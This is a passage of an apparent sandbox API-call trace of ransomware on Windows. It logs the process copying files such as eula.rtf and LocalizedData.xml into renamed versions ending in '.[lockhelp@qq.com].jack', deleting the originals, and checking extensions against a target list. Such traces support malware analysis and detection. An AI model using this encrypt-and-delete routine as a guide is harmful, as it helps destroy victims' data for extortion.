(lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.117] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0196.117] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.117] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.117] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0196.118] GetLastError () returned 0x0 [0196.118] ReadFile (in: hFile=0x3ac, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x81, lpOverlapped=0x0) returned 1 [0196.119] WriteFile (in: hFile=0x3d8, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x90, lpOverlapped=0x0) returned 1 [0196.120] ReadFile (in: hFile=0x3ac, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.120] WriteFile (in: hFile=0x3d8, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xea, lpOverlapped=0x0) returned 1 [0196.120] SetEndOfFile (hFile=0x3d8) returned 1 [0196.121] CloseHandle (hObject=0x3d8) returned 1 [0196.474] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.474] SetEndOfFile (hFile=0x3ac) returned 1 [0196.475] CloseHandle (hObject=0x3ac) returned 1 [0196.475] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x26) returned 1 [0196.475] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini")) returned 1 [0196.475] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0196.476] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0196.476] lstrlenW (lpString=".doc") returned 4 [0196.476] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0196.476] lstrlenW (lpString=".docx") returned 5 [0196.476] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0196.476] lstrlenW (lpString=".pdf") returned 4 [0196.476] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0196.476] lstrlenW (lpString=".xls") returned 4 [0196.476] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0196.476] lstrlenW (lpString=".xlsx") returned 5 [0196.476] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0196.476] lstrlenW (lpString=".ppt") returned 4 [0196.476] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0196.476] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0196.476] lstrlenW (lpString=".zip") returned 4 [0196.476] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0196.476] lstrlenW (lpString=".rar") returned 4 [0196.476] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0196.476] lstrlenW (lpString=".bz2") returned 4 [0196.476] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0196.476] lstrlenW (lpString=".7z") returned 3 [0196.476] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0196.476] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0196.476] lstrlenW (lpString=".dbf") returned 4 [0196.476] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0196.476] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0196.476] lstrlenW (lpString=".1cd") returned 4 [0196.476] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0196.476] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0196.477] lstrlenW (lpString=".jpg") returned 4 [0196.477] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0196.477] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0196.477] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0196.477] lstrlenW (lpString=".doc") returned 4 [0196.477] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0196.477] lstrlenW (lpString=".docx") returned 5 [0196.477] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0196.477] lstrlenW (lpString=".pdf") returned 4 [0196.477] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0196.477] lstrlenW (lpString=".xls") returned 4 [0196.477] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0196.477] lstrlenW (lpString=".xlsx") returned 5 [0196.477] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0196.477] lstrlenW (lpString=".ppt") returned 4 [0196.477] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0196.477] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0196.477] lstrlenW (lpString=".zip") returned 4 [0196.477] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0196.477] lstrlenW (lpString=".rar") returned 4 [0196.477] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0196.477] lstrlenW (lpString=".bz2") returned 4 [0196.477] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0196.477] lstrlenW (lpString=".7z") returned 3 [0196.477] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0196.477] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0196.477] lstrlenW (lpString=".dbf") returned 4 [0196.477] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0196.478] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0196.478] lstrlenW (lpString=".1cd") returned 4 [0196.478] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0196.478] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0196.478] lstrlenW (lpString=".jpg") returned 4 [0196.478] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0196.478] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0196.478] lstrlenW (lpString="eula.rtf") returned 8 [0196.478] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.560] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=3726) returned 1 [0196.560] CloseHandle (hObject=0x3f0) returned 1 [0196.560] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf")) returned 0x80 [0196.560] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.560] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.561] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.561] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.561] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.618] GetLastError () returned 0x0 [0196.618] ReadFile (in: hFile=0x3f0, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0xe8e, lpOverlapped=0x0) returned 1 [0196.629] WriteFile (in: hFile=0x3ec, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xe90, lpOverlapped=0x0) returned 1 [0196.630] ReadFile (in: hFile=0x3f0, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.630] WriteFile (in: hFile=0x3ec, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xe4, lpOverlapped=0x0) returned 1 [0196.630] SetEndOfFile (hFile=0x3ec) returned 1 [0196.630] CloseHandle (hObject=0x3ec) returned 1 [0196.633] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.633] SetEndOfFile (hFile=0x3f0) returned 1 [0196.634] CloseHandle (hObject=0x3f0) returned 1 [0196.634] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.635] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf")) returned 1 [0196.635] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0196.635] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0196.635] lstrlenW (lpString=".doc") returned 4 [0196.635] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.635] lstrlenW (lpString=".docx") returned 5 [0196.635] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.635] lstrlenW (lpString=".pdf") returned 4 [0196.635] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.635] lstrlenW (lpString=".xls") returned 4 [0196.635] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.635] lstrlenW (lpString=".xlsx") returned 5 [0196.635] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.635] lstrlenW (lpString=".ppt") returned 4 [0196.636] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.636] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0196.636] lstrlenW (lpString=".zip") returned 4 [0196.636] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.636] lstrlenW (lpString=".rar") returned 4 [0196.636] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.636] lstrlenW (lpString=".bz2") returned 4 [0196.636] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.636] lstrlenW (lpString=".7z") returned 3 [0196.636] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.636] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0196.636] lstrlenW (lpString=".dbf") returned 4 [0196.636] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.636] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0196.636] lstrlenW (lpString=".1cd") returned 4 [0196.636] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.636] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0196.636] lstrlenW (lpString=".jpg") returned 4 [0196.636] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.636] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0196.636] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0196.636] lstrlenW (lpString=".doc") returned 4 [0196.636] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.636] lstrlenW (lpString=".docx") returned 5 [0196.636] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.636] lstrlenW (lpString=".pdf") returned 4 [0196.636] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.637] lstrlenW (lpString=".xls") returned 4 [0196.637] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.637] lstrlenW (lpString=".xlsx") returned 5 [0196.637] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.637] lstrlenW (lpString=".ppt") returned 4 [0196.637] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.637] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0196.637] lstrlenW (lpString=".zip") returned 4 [0196.637] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.637] lstrlenW (lpString=".rar") returned 4 [0196.637] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.637] lstrlenW (lpString=".bz2") returned 4 [0196.637] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.637] lstrlenW (lpString=".7z") returned 3 [0196.637] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.637] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0196.637] lstrlenW (lpString=".dbf") returned 4 [0196.637] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.638] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0196.638] lstrlenW (lpString=".1cd") returned 4 [0196.638] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.638] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 35 [0196.638] lstrlenW (lpString=".jpg") returned 4 [0196.638] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.638] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0196.638] lstrlenW (lpString="eula.rtf") returned 8 [0196.638] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.639] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=3314) returned 1 [0196.639] CloseHandle (hObject=0x3f0) returned 1 [0196.639] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf")) returned 0x80 [0196.639] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.639] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.639] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.639] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.639] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.644] GetLastError () returned 0x0 [0196.644] ReadFile (in: hFile=0x3f0, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0xcf2, lpOverlapped=0x0) returned 1 [0196.646] WriteFile (in: hFile=0x3ec, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xd00, lpOverlapped=0x0) returned 1 [0196.647] ReadFile (in: hFile=0x3f0, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.647] WriteFile (in: hFile=0x3ec, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xe4, lpOverlapped=0x0) returned 1 [0196.647] SetEndOfFile (hFile=0x3ec) returned 1 [0196.648] CloseHandle (hObject=0x3ec) returned 1 [0196.649] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.649] SetEndOfFile (hFile=0x3f0) returned 1 [0196.650] CloseHandle (hObject=0x3f0) returned 1 [0196.650] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.651] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf")) returned 1 [0196.651] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0196.651] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0196.651] lstrlenW (lpString=".doc") returned 4 [0196.651] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.651] lstrlenW (lpString=".docx") returned 5 [0196.651] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.651] lstrlenW (lpString=".pdf") returned 4 [0196.651] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.651] lstrlenW (lpString=".xls") returned 4 [0196.651] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.651] lstrlenW (lpString=".xlsx") returned 5 [0196.652] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.652] lstrlenW (lpString=".ppt") returned 4 [0196.652] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.652] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0196.652] lstrlenW (lpString=".zip") returned 4 [0196.652] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.652] lstrlenW (lpString=".rar") returned 4 [0196.652] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.652] lstrlenW (lpString=".bz2") returned 4 [0196.652] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.652] lstrlenW (lpString=".7z") returned 3 [0196.652] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.652] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0196.652] lstrlenW (lpString=".dbf") returned 4 [0196.652] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.652] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0196.652] lstrlenW (lpString=".1cd") returned 4 [0196.652] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.652] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0196.652] lstrlenW (lpString=".jpg") returned 4 [0196.652] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.652] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0196.653] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0196.653] lstrlenW (lpString=".doc") returned 4 [0196.653] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0196.653] lstrlenW (lpString=".docx") returned 5 [0196.653] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0196.653] lstrlenW (lpString=".pdf") returned 4 [0196.653] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0196.653] lstrlenW (lpString=".xls") returned 4 [0196.653] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0196.653] lstrlenW (lpString=".xlsx") returned 5 [0196.653] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0196.653] lstrlenW (lpString=".ppt") returned 4 [0196.653] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0196.653] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0196.653] lstrlenW (lpString=".zip") returned 4 [0196.653] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0196.653] lstrlenW (lpString=".rar") returned 4 [0196.653] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0196.653] lstrlenW (lpString=".bz2") returned 4 [0196.653] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0196.653] lstrlenW (lpString=".7z") returned 3 [0196.653] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0196.654] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0196.654] lstrlenW (lpString=".dbf") returned 4 [0196.654] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0196.654] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0196.654] lstrlenW (lpString=".1cd") returned 4 [0196.654] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0196.654] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0196.654] lstrlenW (lpString=".jpg") returned 4 [0196.654] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0196.654] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0196.654] lstrlenW (lpString="LocalizedData.xml") returned 17 [0196.654] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.654] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=77748) returned 1 [0196.655] CloseHandle (hObject=0x3f0) returned 1 [0196.655] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml")) returned 0x80 [0196.655] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.655] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0196.655] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.655] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.655] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0196.655] GetLastError () returned 0x0 [0196.655] ReadFile (in: hFile=0x3f0, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x12fb4, lpOverlapped=0x0) returned 1 [0196.658] WriteFile (in: hFile=0x3ec, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x12fc0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x12fc0, lpOverlapped=0x0) returned 1 [0196.660] ReadFile (in: hFile=0x3f0, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.660] WriteFile (in: hFile=0x3ec, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0xf6, lpOverlapped=0x0) returned 1 [0196.661] SetEndOfFile (hFile=0x3ec) returned 1 [0196.661] CloseHandle (hObject=0x3ec) returned 1 [0196.665] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.665] SetEndOfFile (hFile=0x3f0) returned 1 [0196.666] CloseHandle 